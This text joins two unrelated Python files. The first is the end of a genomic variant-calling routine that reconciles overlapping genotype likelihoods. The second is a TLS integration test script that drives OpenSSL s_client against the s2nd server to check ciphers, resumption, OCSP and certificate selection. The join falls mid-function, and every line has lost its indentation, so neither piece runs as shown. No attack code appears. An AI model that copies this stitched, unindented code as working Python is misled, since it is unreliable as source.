for variant in overlapping_variants:
yield variant
return
# The actual genotype calls produce an inconsistent haplotype. If the number
# of affected variants is "too large", avoid processing since this is an
# exponential process.
if len(overlapping_variants) > _MAX_OVERLAPPING_VARIANTS_TO_RESOLVE:
logging.vlog(
2,
'Overlapping variants are not naturally compatible, and there are too '
'many to exhaustively search (%s). Returning variants without '
'modification, beginning with %s.', len(overlapping_variants),
overlapping_variants[0])
for variant in overlapping_variants:
yield variant
return
# Otherwise, the actual genotype calls are incompatible. Since the genotype
# likelihoods are generally well-calibrated, we examine all configurations of
# genotypes that create compatible haplotypes and retain the single
# configuration with the highest joint likelihood across all variants as the
# proposed genotype assignment. Separately, we rescale the likelihood of each
# individual variant using only the valid genotype configurations. If the
# results are concordant (i.e., the genotype predicted by the marginal
# likelihood for each variant is the same as the genotype predicted when
# maximizing the joint likelihood across all variants), we return variants
# with those calls and the rescaled likelihoods. Otherwise, we log a warning
# and emit the original (incompatible) variants.
#
# For example, a biallelic deletion with probabilities of homref, het, homalt
# = 0.01, 0.9, 0.09 and inside it a biallelic SNP with probs 0.02, 0.48, 0.5.
# Naively this would be called as a heterozygous indel and a homozygous SNP,
# which is impossible as there are three total alternate genotypes. The
# algorithm does the following:
#
# Indel SNP Joint prob
# 0/0 0/0 0.01 * 0.02 = 0.0002
# 0/0 0/1 0.01 * 0.48 = 0.0048
# 0/0 1/1 0.01 * 0.50 = 0.0050
# 0/1 0/0 0.90 * 0.02 = 0.0180
# 0/1 0/1 0.90 * 0.48 = 0.4320*
# 0/1 1/1 <invalid> = 0
# 1/1 0/0 0.09 * 0.02 = 0.0018
# 1/1 0/1 <invalid> = 0
# 1/1 1/1 <invalid> = 0
#
# So using the highest joint likelihood, we predict het indel and het SNP.
#
# The marginal probability of each genotype for the indel is:
# 0/0: 0.0002 + 0.0048 + 0.0050 = 0.01
# 0/1: 0.0180 + 0.4320 = 0.45
# 1/1: 0.0018 = 0.0018
#
# which after normalizing to sum to 1 is roughly 0.022, 0.974, 0.004.
# The marginal probability for the SNP, after performing similar
# calculations, is 0.043, 0.946, 0.011. So the marginals also predict a het
# indel and a het SNP. Since the two calculations agree, we use this
# genotype call and modified likelihoods.
#
# First, we find all non-reference count configurations that are compatible.
# This represents each variant solely based on its number of non-reference
# genotypes, and assumes that variants are compatible if the total number of
# non-reference genotypes at a single position is at most two. By using
# non-reference counts, we avoid testing multiple allele configurations that
# will return the same result (e.g. a variant with two possible alternate
# alleles has three allele configurations that are homozygous alternate
# [1/1, 1/2, 2/2] and either all or none of them will be valid depending on
# the variants it interacts with).
valid_nonref_count_configurations = [
conf
for conf in itertools.product([0, 1, 2], repeat=len(overlapping_variants))
if calculator.all_variants_compatible(conf)
]
# Next, we find the single compatible variant assignment with the individually
# highest likelihood and track the total likelihood distributed to all variant
# genotypes.
likelihood_aggregators = [
_LikelihoodAggregator(len(v.alternate_bases))
for v in overlapping_variants
]
most_likely_allele_indices_config = None
most_likely_likelihood = None
for nonref_count_config in valid_nonref_count_configurations:
for allele_indices_config in _get_all_allele_indices_configurations(
overlapping_variants, nonref_count_config):
config_likelihood = _allele_indices_configuration_likelihood(
overlapping_variants, allele_indices_config)
if (most_likely_likelihood is None or
config_likelihood > most_likely_likelihood):
most_likely_likelihood = config_likelihood
most_likely_allele_indices_config = allele_indices_config
for aggregator, allele_indices in zip(likelihood_aggregators,
allele_indices_config):
aggregator.add(allele_indices, config_likelihood)
marginal_allele_indices_config = tuple(
agg.most_likely_allele_indices() for agg in likelihood_aggregators)
if marginal_allele_indices_config == most_likely_allele_indices_config:
logging.vlog(
2,
'Overlapping variants are not naturally compatible, but the genotype '
'configuration with the most likely joint likelihood is the same as '
'that from the scaled marginal likelihoods: %s',
overlapping_variants[0])
# Collapse the probabilities of all configurations to a single GL for each
# allele, independently for each variant.
scaled_gls = [agg.scaled_likelihoods() for agg in likelihood_aggregators]
for variant, allele_indices, gls in zip(overlapping_variants,
most_likely_allele_indices_config,
scaled_gls):
newvariant = copy.deepcopy(variant)
call = variant_utils.only_call(newvariant)
call.genotype[:] = allele_indices
call.genotype_likelihood[:] = gls
yield newvariant
else:
logging.vlog(
2,
'Overlapping variants are not naturally compatible, and the genotype '
'configuration with the most likely joint likelihood is different from '
'that using the scaled marginal likelihoods: %s',
overlapping_variants[0])
# redacted
for variant in overlapping_variants:
yield variant
def _get_all_allele_indices_configurations(variants,
nonref_count_configuration):
"""Returns an iterable of allele configurations that satisfy the genotype.
Args:
variants: list(Variant). The list of variants for which to generate
configurations of valid allele_indices.
nonref_count_configuration: list(int). The list of numbers of non-reference
genotypes that should be generated for each variant.
Returns:
Iterable of lists of allele indices to assign to each Variant to satisfy the
desired configuration of number of non-reference genotypes for each variant.
Raises:
ValueError: variants and nonref_count_configuration do not have the same
length.
"""
if len(variants) != len(nonref_count_configuration):
raise ValueError(
'len(variants) must equal len(nonref_count_configuration): {} vs {}'
.format(len(variants), len(nonref_count_configuration)))
allele_indices_configs = [
variant_utils.allele_indices_with_num_alts(variant, num_alts, ploidy=2)
for variant, num_alts in zip(variants, nonref_count_configuration)
]
return itertools.product(*allele_indices_configs)
def _allele_indices_configuration_likelihood(variants, allele_indices_config):
"""Returns the joint likelihood of the alleles given to the variants.
Args:
variants: list(Variant). The variants with associated likelihoods.
allele_indices_config: list((int, int)). The allele indices to assign to
each variant.
Returns:
The joint likelihood of the particular allele configuration.
Raises:
ValueError: variants and allele_indices_config do not have the same length.
"""
if len(variants) != len(allele_indices_config):
raise ValueError(
'len(variants) must equal len(allele_indices_config): {} vs {}'.format(
len(variants), len(allele_indices_config)))
retval = 0
for variant, alleles in zip(variants, allele_indices_config):
retval += variant_utils.genotype_likelihood(
variant_utils.only_call(variant), alleles)
return retval
def _nonref_genotype_count(variant):
"""Returns the number of non-reference alleles in the called genotype."""
return sum(g > 0 for g in variant_utils.only_call(variant).genotype)
|
|
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
#
"""
Handshake tests using Openssl s_client against s2nd
Openssl 1.1.0 removed SSLv3, 3DES, an RC4, so we won't have coverage there.
"""
import argparse
import os
import sys
import subprocess
import itertools
import multiprocessing
import threading
import uuid
import re
import string
from os import environ
from multiprocessing.pool import ThreadPool
from s2n_test_constants import *
from time import sleep
PROTO_VERS_TO_S_CLIENT_ARG = {
S2N_TLS10 : "-tls1",
S2N_TLS11 : "-tls1_1",
S2N_TLS12 : "-tls1_2",
}
S_CLIENT_SUCCESSFUL_OCSP="OCSP Response Status: successful"
S_CLIENT_NEGOTIATED_CIPHER_PREFIX="Cipher : "
S_CLIENT_HOSTNAME_MISMATCH="verify error:num=62:Hostname mismatch"
# Server certificate starts on the line after this one.
S_CLIENT_START_OF_SERVER_CERTIFICATE="Server certificate"
S_CLIENT_LAST_CERTIFICATE_LINE_PATTERN=re.compile("-----END.*CERTIFICATE-----")
S_CLIENT_SERVER_NAME_EXTENSION='TLS server extension "server name"'
class TlsExtensionServerName:
def s_client_validate(s_client_out):
s_client_out_len = len(s_client_out)
for line in s_client_out.splitlines():
if S_CLIENT_SERVER_NAME_EXTENSION in line:
return 0
print("Did not find the ServerName extension as expected!")
return -1
use_corked_io=False
def cleanup_processes(*processes):
for p in processes:
p.kill()
p.wait()
def validate_data_transfer(expected_data, s_client_out, s2nd_out):
"""
Verify that the application data written between s_client and s2nd is encrypted and decrypted successfuly.
"""
found = 0
for line in s2nd_out.splitlines():
if expected_data in line:
found = 1
break
if found == 0:
print ("Did not find " + expected_data + " in output from s2nd")
return -1
found = 0
for line in s_client_out.splitlines():
if expected_data in line:
found = 1
break
if found == 0:
print ("Did not find " + expected_data + " in output from s_client")
return -1
return 0
def validate_resume(s2nd_out):
"""
Verify that s2nd properly resumes sessions.
"""
resume_count = 0
for line in s2nd_out.splitlines():
if line.startswith("Resumed session"):
resume_count += 1
if resume_count == 5:
break
if resume_count != 5:
print ("Validate resumption failed")
return -1
return 0
def validate_ocsp(s_client_out):
"""
Verify that stapled OCSP response is accepted by s_client.
"""
s_client_out_len = len(s_client_out)
for line in s_client_out.splitlines():
if S_CLIENT_SUCCESSFUL_OCSP in line:
return 0
break
print ("Validate OCSP failed")
return -1
def find_expected_cipher(expected_cipher, s_client_out):
"""
Make sure s_client and s2nd negotiate the cipher suite we expect
"""
s_client_out_len = len(s_client_out)
full_expected_string = S_CLIENT_NEGOTIATED_CIPHER_PREFIX + expected_cipher
for line in s_client_out.splitlines():
if full_expected_string in line:
return 0
break
print("Failed to find " + expected_cipher + " in s_client output")
return -1
def validate_hostname(s_client_out):
"""
Make sure that s_client did not error on hostname mismatch.
This function is only valid if s_client output was invoked with "-verify_hostname" argument
"""
s_client_out_len = len(s_client_out)
for line in s_client_out.splitlines():
if S_CLIENT_HOSTNAME_MISMATCH in line:
print("Server certificate hostname did not match client server_name")
return 1
return 0
def validate_selected_certificate(s_client_out, expected_cert_path):
"""
Make sure that the server certificate that s_client sees is the certificate we expect.
"""
s_client_out_len = len(s_client_out)
start_found = 0
cert_str = ""
for line in s_client_out.splitlines():
# Spin until we get to the start of the cert
if start_found == 0:
if S_CLIENT_START_OF_SERVER_CERTIFICATE in line:
start_found = 1
else:
cert_str+=line
cert_str+="\n"
# reached the end of the cert.
if S_CLIENT_LAST_CERTIFICATE_LINE_PATTERN.match(line):
break
expected_cert_str = open(expected_cert_path).read()
if "".join(cert_str.split()) != "".join(expected_cert_str.split()):
print("The expected certificate was not served!!!")
print("The cert I expected: \n" + expected_cert_str)
print("The cert I got: \n" + cert_str)
return -1
return 0
def read_process_output_until(process, marker):
output = ""
while True:
line = process.stdout.readline().decode("utf-8")
output += line
if marker in line:
return output
return output
def try_handshake(endpoint, port, cipher, ssl_version, server_name=None, strict_hostname=False, server_cert=None, server_key=None,
server_cert_key_list=None, expected_server_cert=None, server_cipher_pref=None, ocsp=None, sig_algs=None, curves=None, resume=False, no_ticket=False,
prefer_low_latency=False, enter_fips_mode=False, client_auth=None, client_cert=DEFAULT_CLIENT_CERT_PATH,
client_key=DEFAULT_CLIENT_KEY_PATH, expected_cipher=None, expected_extensions=None):
"""
Attempt to handshake against s2nd listening on `endpoint` and `port` using Openssl s_client
:param int endpoint: endpoint for s2nd to listen on
:param int port: port for s2nd to listen on
:param str cipher: ciphers for Openssl s_client to offer. See https://www.openssl.org/docs/man1.0.2/apps/ciphers.html
:param int ssl_version: SSL version for s_client to use
:param str server_name: server_name value for s_client to send
:param bool strict_hostname: whether s_client should strictly check to see if server certificate matches the server_name
:param str server_cert: path to certificate for s2nd to use
:param str server_key: path to private key for s2nd to use
:param list server_cert_key_list: a list of (cert_path, key_path) tuples for multicert tests.
:param str expected_server_cert: Path to the expected server certificate should be sent to s_client.
:param str ocsp: path to OCSP response file for stapling
:param str sig_algs: Signature algorithms for s_client to offer
:param str curves: Elliptic curves for s_client to offer
:param bool resume: True if s_client should try to reconnect to s2nd and reuse the same TLS session. False for normal negotiation.
:param bool no_ticket: True if s2n server should not use session ticket to resume the same TLS session.
:param bool prefer_low_latency: True if s2nd should use 1500 for max outgoing record size. False for default max.
:param bool enter_fips_mode: True if s2nd should enter libcrypto's FIPS mode. Libcrypto must be built with a FIPS module to enter FIPS mode.
:param bool client_auth: True if the test should try and use client authentication
:param str client_cert: Path to the client's cert file
:param str client_key: Path to the client's private key file
:param str expected_cipher: the cipher we expect to negotiate
:param list expected_extensions: list of expected extensions that s_client should receive.
:return: 0 on successfully negotiation(s), -1 on failure
"""
# Override certificate for ECDSA if unspecified. We can remove this when we
# support multiple certificates
if server_cert is None and server_cert_key_list is None and "ECDSA" in cipher:
server_cert = TEST_ECDSA_CERT
server_key = TEST_ECDSA_KEY
# Fire up s2nd
s2nd_cmd = ["../../bin/s2nd"]
if server_cert is not None:
s2nd_cmd.extend(["--cert", server_cert])
if server_key is not None:
s2nd_cmd.extend(["--key", server_key])
if server_cert_key_list is not None:
for cert_key_path in server_cert_key_list:
cert_path = cert_key_path[0]
key_path = cert_key_path[1]
s2nd_cmd.extend(["--cert", cert_path])
s2nd_cmd.extend(["--key", key_path])
if ocsp is not None:
s2nd_cmd.extend(["--ocsp", ocsp])
if prefer_low_latency == True:
s2nd_cmd.append("--prefer-low-latency")
if client_auth is not None:
s2nd_cmd.append("-m")
s2nd_cmd.extend(["-t", client_cert])
s2nd_cmd.extend([str(endpoint), str(port)])
s2nd_ciphers = "test_all"
if server_cipher_pref is not None:
s2nd_ciphers = server_cipher_pref
if enter_fips_mode == True:
s2nd_ciphers = "test_all_fips"
s2nd_cmd.append("--enter-fips-mode")
s2nd_cmd.append("-c")
s2nd_cmd.append(s2nd_ciphers)
if no_ticket:
s2nd_cmd.append("-T")
if use_corked_io:
s2nd_cmd.append("-C")
s2nd = subprocess.Popen(s2nd_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Make sure s2nd has started
s2nd.stdout.readline()
s_client_cmd = ["openssl", "s_client", PROTO_VERS_TO_S_CLIENT_ARG[ssl_version],
"-connect", str(endpoint) + ":" + str(port)]
if cipher is not None:
s_client_cmd.extend(["-cipher", cipher])
if sig_algs is not None:
s_client_cmd.extend(["-sigalgs", sig_algs])
if curves is not None:
s_client_cmd.extend(["-curves", curves])
if resume == True:
s_client_cmd.append("-reconnect")
if client_auth is not None:
s_client_cmd.extend(["-key", client_key])
s_client_cmd.extend(["-cert", client_cert])
if ocsp is not None:
s_client_cmd.append("-status")
if server_name is not None:
s_client_cmd.extend(["-servername", server_name])
if strict_hostname is True:
s_client_cmd.extend(["-verify_hostname", server_name])
else:
s_client_cmd.append("-noservername")
# For verifying extensions that s2nd sends expected extensions
s_client_cmd.append("-tlsextdebug")
# Fire up s_client
s_client = subprocess.Popen(s_client_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
s_client_out = ""
s2nd_out = ""
openssl_connect_marker = "CONNECTED"
openssl_reconnect_marker = "drop connection and then reconnect"
end_of_msg_marker = "__end_of_msg__"
# Wait until openssl and s2n have finished the handshake and are connected to each other
s_client_out += read_process_output_until(s_client, openssl_connect_marker)
s2nd_out += read_process_output_until(s2nd, openssl_connect_marker)
if resume == True:
for i in range(0,5):
# Wait for openssl to resume connection 5 times in a row, and verify resumption works.
s_client_out += read_process_output_until(s_client, openssl_reconnect_marker)
s2nd_out += read_process_output_until(s2nd, openssl_connect_marker)
data_to_validate = cipher + " " + str(uuid.uuid4())
# Write the data to openssl towards s2n server
msg = (data_to_validate + "\n" + end_of_msg_marker + "\n\n").encode("utf-8")
s_client.stdin.write(msg)
s_client.stdin.flush()
# Write the data to s2n towards openssl client
s2nd.stdin.write(msg)
s2nd.stdin.flush()
# Wait for the Data transfer to complete between OpenSSL and s2n
s_client_out += read_process_output_until(s_client, end_of_msg_marker)
s2nd_out += read_process_output_until(s2nd, end_of_msg_marker)
cleanup_processes(s2nd, s_client)
if validate_data_transfer(data_to_validate, s_client_out, s2nd_out) != 0:
return -1
if resume is True:
if validate_resume(s2nd_out) != 0:
return -1
if ocsp is not None:
if validate_ocsp(s_client_out) != 0:
return -1
if expected_cipher is not None:
if find_expected_cipher(expected_cipher, s_client_out) != 0:
return -1
if strict_hostname is True:
if validate_hostname(s_client_out) != 0:
return -1
if expected_server_cert is not None:
if validate_selected_certificate(s_client_out, expected_server_cert) != 0:
return -1
if expected_extensions is not None:
for extension in expected_extensions:
if extension.s_client_validate(s_client_out) != 0:
return -1
return 0
def cert_path_to_str(cert_path):
# Converts a path to a cert into a string usable for printing to test output
# Example: "./test_certs/rsa_2048_sha256_client_cert.pem" => "RSA-2048-SHA256"
return '-'.join(cert_path[cert_path.rfind('/')+1:].split('_')[:3]).upper()
def print_result(result_prefix, return_code):
suffix = ""
if return_code == 0:
if sys.stdout.isatty():
suffix = "\033[32;1mPASSED\033[0m"
else:
suffix = "PASSED"
else:
if sys.stdout.isatty():
suffix = "\033[31;1mFAILED\033[0m"
else:
suffix ="FAILED"
print(result_prefix + suffix)
def create_thread_pool():
threadpool_size = multiprocessing.cpu_count() * 4 # Multiply by 4 to increase parallelization between integration tests
print("\tCreating ThreadPool of size: " + str(threadpool_size))
threadpool = ThreadPool(processes=threadpool_size)
return threadpool
def run_handshake_test(host, port, ssl_version, cipher, fips_mode, no_ticket, use_client_auth, client_cert_path, client_key_path):
cipher_name = cipher.openssl_name
cipher_vers = cipher.min_tls_vers
# Skip the cipher if openssl can't test it. 3DES/RC4 are disabled by default in 1.1.1
if not cipher.openssl_1_1_1_compatible:
return 0
if ssl_version < cipher_vers:
return 0
client_cert_str=str(use_client_auth)
if (use_client_auth is not None) and (client_cert_path is not None):
client_cert_str = cert_path_to_str(client_cert_path)
ret = try_handshake(host, port, cipher_name, ssl_version, no_ticket=no_ticket, enter_fips_mode=fips_mode, client_auth=use_client_auth, client_cert=client_cert_path, client_key=client_key_path)
result_prefix = "Cipher: %-30s ClientCert: %-16s Vers: %-8s ... " % (cipher_name, client_cert_str, S2N_PROTO_VERS_TO_STR[ssl_version])
print_result(result_prefix, ret)
return ret
def handshake_test(host, port, test_ciphers, fips_mode, no_ticket=False, use_client_auth=None, use_client_cert=None, use_client_key=None):
"""
Basic handshake tests using all valid combinations of supported cipher suites and TLS versions.
"""
print("\n\tRunning handshake tests:")
failed = 0
for ssl_version in [S2N_TLS10, S2N_TLS11, S2N_TLS12]:
print("\n\tTesting ciphers using client version: " + S2N_PROTO_VERS_TO_STR[ssl_version])
threadpool = create_thread_pool()
port_offset = 0
results = []
for cipher in test_ciphers:
async_result = threadpool.apply_async(run_handshake_test, (host, port + port_offset, ssl_version, cipher, fips_mode, no_ticket, use_client_auth, use_client_cert, use_client_key))
port_offset += 1
results.append(async_result)
threadpool.close()
threadpool.join()
for async_result in results:
if async_result.get() != 0:
failed = 1
return failed
def client_auth_test(host, port, test_ciphers, fips_mode):
failed = 0
print("\n\tRunning client auth tests:")
for filename in os.listdir(TEST_CERT_DIRECTORY):
if "client_cert" in filename and "rsa" in filename:
client_cert_path = TEST_CERT_DIRECTORY + filename
client_key_path = TEST_CERT_DIRECTORY + filename.replace("client_cert", "client_key")
ret = handshake_test(host, port, test_ciphers, fips_mode, no_ticket=True, use_client_auth=True, use_client_cert=client_cert_path, use_client_key=client_key_path)
if ret is not 0:
failed += 1
return failed
def run_resume_test(host, port, cipher_name, ssl_version, resume, no_ticket, fips_mode):
ret = try_handshake(host, port, cipher_name, ssl_version, resume=resume, no_ticket=no_ticket, enter_fips_mode=fips_mode)
result_prefix = "Cipher: %-30s Vers: %-10s ... " % (cipher_name, S2N_PROTO_VERS_TO_STR[ssl_version])
print_result(result_prefix, ret)
return ret
def resume_test(host, port, test_ciphers, fips_mode, no_ticket=False):
"""
Tests s2n's session resumption capability using all valid combinations of cipher suite and TLS version.
"""
if no_ticket:
print("\n\tRunning resumption tests using session id:")
else:
print("\n\tRunning resumption tests using session ticket:")
failed = 0
results = []
for ssl_version in [S2N_TLS10, S2N_TLS11, S2N_TLS12]:
port_offset = 0
threadpool = create_thread_pool()
print("\n\tTesting ciphers using client version: " + S2N_PROTO_VERS_TO_STR[ssl_version])
for cipher in test_ciphers:
cipher_name = cipher.openssl_name
cipher_vers = cipher.min_tls_vers
# Skip the cipher if openssl can't test it. 3DES/RC4 are disabled by default in 1.1.1
if not cipher.openssl_1_1_1_compatible:
continue
if ssl_version < cipher_vers:
continue
async_result = threadpool.apply_async(run_resume_test, (host, port + port_offset, cipher_name, ssl_version, True, no_ticket, fips_mode))
port_offset += 1
results.append(async_result)
threadpool.close()
threadpool.join()
for async_result in results:
if async_result.get() != 0:
failed = 1
return failed
supported_sigs = ["RSA+SHA1", "RSA+SHA224", "RSA+SHA256", "RSA+SHA384", "RSA+SHA512"]
unsupported_sigs = ["ECDSA+SHA256", "ECDSA+SHA512"]
def run_sigalg_test(host, port, cipher, ssl_version, permutation, fips_mode, use_client_auth, no_ticket):
# Put some unsupported algs in front to make sure we gracefully skip them
mixed_sigs = unsupported_sigs + list(permutation)
mixed_sigs_str = ':'.join(mixed_sigs)
ret = try_handshake(host, port, cipher.openssl_name, ssl_version, sig_algs=mixed_sigs_str, no_ticket=no_ticket, enter_fips_mode=fips_mode, client_auth=use_client_auth)
# Trim the RSA part off for brevity. User should know we are only supported RSA at the moment.
prefix = "Digests: %-35s ClientAuth: %-6s Vers: %-8s... " % (':'.join([x[4:] for x in permutation]), str(use_client_auth), S2N_PROTO_VERS_TO_STR[S2N_TLS12])
print_result(prefix, ret)
return ret
def sigalg_test(host, port, fips_mode, use_client_auth=None, no_ticket=False):
"""
Acceptance test for supported signature algorithms. Tests all possible supported sigalgs with unsupported ones mixed in
for noise.
"""
failed = 0
print("\n\tRunning signature algorithm tests:")
print("\tExpected supported: " + str(supported_sigs))
print("\tExpected unsupported: " + str(unsupported_sigs))
for size in range(1, len(supported_sigs) + 1):
print("\n\t\tTesting ciphers using signature preferences of size: " + str(size))
threadpool = create_thread_pool()
portOffset = 0
results = []
# Produce permutations of every accepted signature algorithm in every possible order
for permutation in itertools.permutations(supported_sigs, size):
for cipher in ALL_TEST_CIPHERS:
# Try an ECDHE cipher suite and a DHE one
if(cipher.openssl_name == "ECDHE-RSA-AES128-GCM-SHA256" or cipher.openssl_name == "DHE-RSA-AES128-GCM-SHA256"):
async_result = threadpool.apply_async(run_sigalg_test, (host, port + portOffset, cipher, S2N_TLS12, permutation, fips_mode, use_client_auth, no_ticket))
portOffset = portOffset + 1
results.append(async_result)
threadpool.close()
threadpool.join()
for async_result in results:
if async_result.get() != 0:
failed = 1
return failed
def elliptic_curve_test(host, port, fips_mode):
"""
Acceptance test for supported elliptic curves. Tests all possible supported curves with unsupported curves mixed in
for noise.
"""
supported_curves = ["P-256", "P-384"]
unsupported_curves = ["B-163", "K-409"]
print("\n\tRunning elliptic curve tests:")
print("\tExpected supported: " + str(supported_curves))
print("\tExpected unsupported: " + str(unsupported_curves))
failed = 0
for size in range(1, len(supported_curves) + 1):
print("\n\t\tTesting ciphers using curve list of size: " + str(size))
# Produce permutations of every accepted curve in every possible order
for permutation in itertools.permutations(supported_curves, size):
# Put some unsupported curves in front to make sure we gracefully skip them
mixed_curves = unsupported_curves + list(permutation)
mixed_curves_str = ':'.join(mixed_curves)
for cipher in filter(lambda x: x.openssl_name == "ECDHE-RSA-AES128-GCM-SHA256" or x.openssl_name == "ECDHE-RSA-AES128-SHA", ALL_TEST_CIPHERS):
if fips_mode and cipher.openssl_fips_compatible == False:
continue
ret = try_handshake(host, port, cipher.openssl_name, S2N_TLS12, curves=mixed_curves_str, enter_fips_mode=fips_mode)
prefix = "Curves: %-40s Vers: %10s ... " % (':'.join(list(permutation)), S2N_PROTO_VERS_TO_STR[S2N_TLS12])
print_result(prefix, ret)
if ret != 0:
failed = 1
return failed
def elliptic_curve_fallback_test(host, port, fips_mode):
"""
Tests graceful fallback when s2n doesn't support any curves offered by the client. A non-ecc suite should be
negotiated.
"""
failed = 0
# Make sure s2n can still negotiate a non-EC kx(AES256-GCM-SHA384) suite if we don't match anything on the client
unsupported_curves = ["B-163", "K-409"]
ret = try_handshake(host, port, "ECDHE-RSA-AES128-SHA256:AES256-GCM-SHA384", S2N_TLS12, curves=":".join(unsupported_curves), enter_fips_mode=fips_mode)
print_result("%-65s ... " % "Testing curve mismatch fallback", ret)
if ret != 0:
failed = 1
return failed
def handshake_fragmentation_test(host, port, fips_mode):
"""
Tests successful negotation with s_client despite message fragmentation. Max record size is clamped to force s2n
to fragment the ServerCertifcate message.
"""
print("\n\tRunning handshake fragmentation tests:")
failed = 0
for ssl_version in [S2N_TLS10, S2N_TLS11, S2N_TLS12]:
print("\n\tTesting ciphers using client version: " + S2N_PROTO_VERS_TO_STR[ssl_version])
# Cipher isn't relevant for this test, pick one available in all OpenSSL versions and all TLS versions
cipher_name = "AES256-SHA"
# Low latency option indirectly forces fragmentation.
ret = try_handshake(host, port, cipher_name, ssl_version, prefer_low_latency=True, enter_fips_mode=fips_mode)
result_prefix = "Cipher: %-30s Vers: %-10s ... " % (cipher_name, S2N_PROTO_VERS_TO_STR[ssl_version])
print_result(result_prefix, ret)
if ret != 0:
failed = 1
failed = 0
return failed
def ocsp_stapling_test(host, port, fips_mode):
"""
Test s2n's server OCSP stapling capability
"""
print("\n\tRunning OCSP stapling tests:")
failed = 0
for ssl_version in [S2N_TLS10, S2N_TLS11, S2N_TLS12]:
print("\n\tTesting ciphers using client version: " + S2N_PROTO_VERS_TO_STR[ssl_version])
# Cipher isn't relevant for this test, pick one available in all TLS versions
cipher_name = "AES256-SHA"
ret = try_handshake(host, port, cipher_name, ssl_version, enter_fips_mode=fips_mode, server_cert=TEST_OCSP_CERT, server_key=TEST_OCSP_KEY,
ocsp=TEST_OCSP_RESPONSE_FILE)
result_prefix = "Cipher: %-30s Vers: %-10s ... " % (cipher_name, S2N_PROTO_VERS_TO_STR[ssl_version])
print_result(result_prefix, ret)
if ret != 0:
failed = 1
return failed
def cert_type_cipher_match_test(host, port):
"""
Test s2n server's ability to correctly choose ciphers. (Especially RSA vs ECDSA)
"""
print("\n\tRunning cipher matching tests:")
failed = 0
cipher = "ALL"
supported_curves = "P-256:P-384"
# Handshake with RSA cert + ECDSApriority server cipher pref (must skip ecdsa ciphers)
rsa_ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cipher_pref="test_ecdsa_priority")
result_prefix = "Cert Type: rsa Server Pref: ecdsa priority. Vers: TLSv1.2 ... "
print_result(result_prefix, rsa_ret)
if rsa_ret != 0:
failed = 1
# Handshake with ECDSA cert + RSA priority server cipher prefs (must skip rsa ciphers)
ecdsa_ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert=TEST_ECDSA_CERT, server_key=TEST_ECDSA_KEY, server_cipher_pref="test_all")
result_prefix = "Cert Type: ecdsa Server Pref: rsa priority. Vers: TLSv1.2 ... "
print_result(result_prefix, ecdsa_ret)
if ecdsa_ret != 0:
failed = 1
return failed
def multiple_cert_type_test(host, port):
"""
Test s2n server's ability to correctly choose ciphers and serve the correct cert depending on the auth type for a
given cipher.
"""
print("\n\tRunning multiple server cert type test:")
# Basic handshake with ECDSA cert + RSA cert
for cipher in ["ECDHE-ECDSA-AES128-SHA", "ECDHE-RSA-AES128-GCM-SHA256"]:
supported_curves = "P-256:P-384"
server_prefs = "test_all"
ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert_key_list=[(TEST_RSA_CERT, TEST_RSA_KEY),(TEST_ECDSA_CERT, TEST_ECDSA_KEY)],
server_cipher_pref=server_prefs)
result_prefix = "Certs: [RSA, ECDSA] Client Prefs " + cipher + " Server Pref: " + server_prefs + " Vers: TLSv1.2 ... "
print_result(result_prefix, ret)
if ret != 0:
return ret
# Handshake with ECDSA + RSA cert but no ecdsa ciphers configured on the server
for cipher in ["ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES128-GCM-SHA256", "AES128-SHA"]:
supported_curves = "P-256:P-384"
server_prefs = "20170210"
ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert_key_list=[(TEST_RSA_CERT, TEST_RSA_KEY),(TEST_ECDSA_CERT, TEST_ECDSA_KEY)],
server_cipher_pref=server_prefs)
result_prefix = "Certs: [RSA, ECDSA] Client Prefs " + cipher + " Server Pref: " + server_prefs + " Vers: TLSv1.2 ... "
print_result(result_prefix, ret)
if ret != 0:
return ret
# Handshake with ECDSA + RSA cert but no rsa ciphers configured on the server
for cipher in ["ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-GCM-SHA256", "ECDHE-ECDSA-AES256-SHA"]:
supported_curves = "P-256:P-384"
server_prefs = "test_all_ecdsa"
ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert_key_list=[(TEST_RSA_CERT, TEST_RSA_KEY),(TEST_ECDSA_CERT, TEST_ECDSA_KEY)],
server_cipher_pref=server_prefs)
result_prefix = "Certs: [RSA, ECDSA] Client Prefs " + cipher + " Server Pref: " + server_prefs + " Vers: TLSv1.2 ... "
print_result(result_prefix, ret)
if ret != 0:
return ret
# Handshake with ECDSA + RSA cert but no overlapping ecc curves for ECDHE kx.
# s2n should fallback to a cipher with RSA kx.
for cipher in ["ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-GCM-SHA256:AES128-SHA", "ECDHE-ECDSA-AES256-SHA:AES128-SHA"]:
# Assume this is a curve s2n does not support
supported_curves = "P-521"
server_prefs = "test_all"
ret = try_handshake(host, port, cipher, S2N_TLS12, curves=supported_curves,
server_cert_key_list=[(TEST_RSA_CERT, TEST_RSA_KEY),(TEST_ECDSA_CERT, TEST_ECDSA_KEY)],
server_cipher_pref=server_prefs)
result_prefix = "Certs: [RSA, ECDSA] Client Prefs " + cipher + " Server Pref: " + server_prefs + " Vers: TLSv1.2 ... "
print_result(result_prefix, ret)
if ret != 0:
return ret
return 0
def multiple_cert_domain_name_test(host, port):
'''
Test s2n server's ability to select the correct certificate based on the client ServerName extension.
Validates that the correct certificate is selected and s_client does not throw and hostname validation errors.
'''
print("\n\tRunning multiple server cert domain name test:")
for test_case in MULTI_CERT_TEST_CASES:
cert_key_list = [(cert[0],cert[1]) for cert in test_case.server_certs]
client_sni = test_case.client_sni
client_ciphers = test_case.client_ciphers
expected_cert_path = test_case.expected_cert[0]
expect_hostname_match = test_case.expect_matching_hostname
